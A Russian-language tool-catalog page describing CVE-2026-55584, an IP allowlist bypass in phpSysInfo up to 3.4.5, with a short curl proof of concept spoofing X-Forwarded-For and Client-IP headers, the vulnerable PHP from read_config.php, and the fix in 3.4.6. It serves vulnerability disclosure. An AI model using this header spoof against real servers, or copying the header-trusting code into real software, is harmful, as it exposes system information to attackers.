Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-55584 — CVE-2026-55584 — Обход списка разрешённых IP-адресов в phpSysInfo | Kitploit
Инструменты/GitHubGitHub/mirackayikci/cve-2026-55584
Аутентификация и авторизацияАнализ уязвимостейЭксплуатацияВеб-безопасностьТестирование на ПроникновениеНеправильная Конфигурация
GitHubmirackayikci/cve-2026-55584

CVE-2026-55584

CVE-2026-55584 — Обход списка разрешённых IP-адресов в phpSysInfo

Репозиторий
12 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-55584 - Обход белого списка IP в phpSysInfo

CWE-290, CVSS 7.5 (высокий), phpSysInfo <= 3.4.5

Ссылки: GHSA-786w-p5pm-cvgh, CVE.org

PSI_ALLOWED определяет IP-адрес клиента из управляемого атакующим заголовка X-Forwarded-For (затем Client-IP), прежде чем перейти к REMOTE_ADDR. Понятие доверенного прокси отсутствует, поэтому подделка разрешённого IP-адреса обходит белый список и раскрывает полную информацию о системе через xml.php.

PoC:

root@kitploit:~
# allowlist set to an address the attacker doesn't own (ALLOWED=8.8.8.8)
curl -s http://target/xml.php                                # "Client IP address (...) not allowed."
curl -s -H "X-Forwarded-For: 8.8.8.8" http://target/xml.php  # bypass, full XML
curl -s -H "Client-IP: 8.8.8.8"       http://target/xml.php  # bypass, full XML

Уязвимый код (read_config.php):

root@kitploit:~
if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])) {
    $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
} elseif (isset($_SERVER["HTTP_CLIENT_IP"])) {
    $ip = $_SERVER["HTTP_CLIENT_IP"];
} else {
    $ip = $_SERVER["REMOTE_ADDR"];   // only trustworthy source, checked last
}

Исправлено в 3.4.6 (019fa2d): по умолчанию используется REMOTE_ADDR; заголовки X-Forwarded-For / Client-IP принимаются только от настроенных доверенных прокси.

Сообщил Muhammed Mirac Kayıkci

Скачать инструмент